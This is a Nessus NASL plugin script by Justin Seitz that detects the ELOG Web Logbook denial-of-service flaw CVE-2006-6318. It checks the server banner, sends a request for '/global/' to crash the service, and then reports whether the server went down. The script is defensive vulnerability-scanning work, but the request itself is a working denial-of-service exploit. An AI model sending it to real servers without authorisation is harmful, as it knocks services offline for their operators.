# kst-gpl
#
#	This script was written by Justin Seitz <jms@bughunter.ca>
#	Per Justin : GPLv2
#

if(description) {
	script_id(80056);;
	script_version("$Revision: 1.4 $");

	script_cve_id("CVE-2006-6318");
	script_bugtraq_id(21028);
	script_xref(name:"OSVDB", value:"30272");

	name = "ELOG Web LogBook global Denial of Service";
	summary = "Tries to crash the remote service.";
	family = "Web application abuses";

	script_name(name);
desc = "
Synopsis :

The remote web server is affected by a denial of service issue. 

Description :

The remote web server is identified as ELOG Web Logbook, an open
source blogging software. 

The version of ELOG Web Logbook installed on the remote host is
vulnerable to a denial of service attack by requesting '/global' or
any logbook with 'global' in its name.  When a request like this is
received, a NULL pointer dereference occurs, leading to a crash of the
service. 

See also :

http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0198.html
http://savannah.psi.ch/websvn/log.php?repname=elog&path=/trunk/&rev=1749&sc=1&isdir=1
http://midas.psi.ch/elogs/Forum/2053

Solution : 

Upgrade to ELOG version 2.6.2-7 or later.

Risk Factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P)";
	script_description(desc);
	script_summary(summary);

	script_category(ACT_DENIAL);
	script_copyright("This script is Copyright (C) 2006 Justin Seitz");

	script_family(family);

	script_dependencies("http_version.nasl");
	script_require_ports("Services/www", 8080);
	exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

#
#
#	Verify we can talk to the web server either on port 8080 (the default).
#
#

port = get_http_port(default:8080);
if(!get_port_state(port)) exit(0);
if (http_is_dead(port:port)) exit(0);

#
#
#	Verify its ELOG and send the DOS if it is.
#
#

banner = get_http_banner(port:port);
if (!isnull(banner) && "Server: ELOG HTTP" >< banner) {

	uri = "/global/";
	attackreq = http_get(port:port, item:uri);
	attackres = http_send_recv(port:port, data:attackreq);

	#
	#
	#	Try to connect to the web server, if you can't you know its busted.
	#
	#

	if(http_is_dead(port:port))
		security_warning(port);	
}
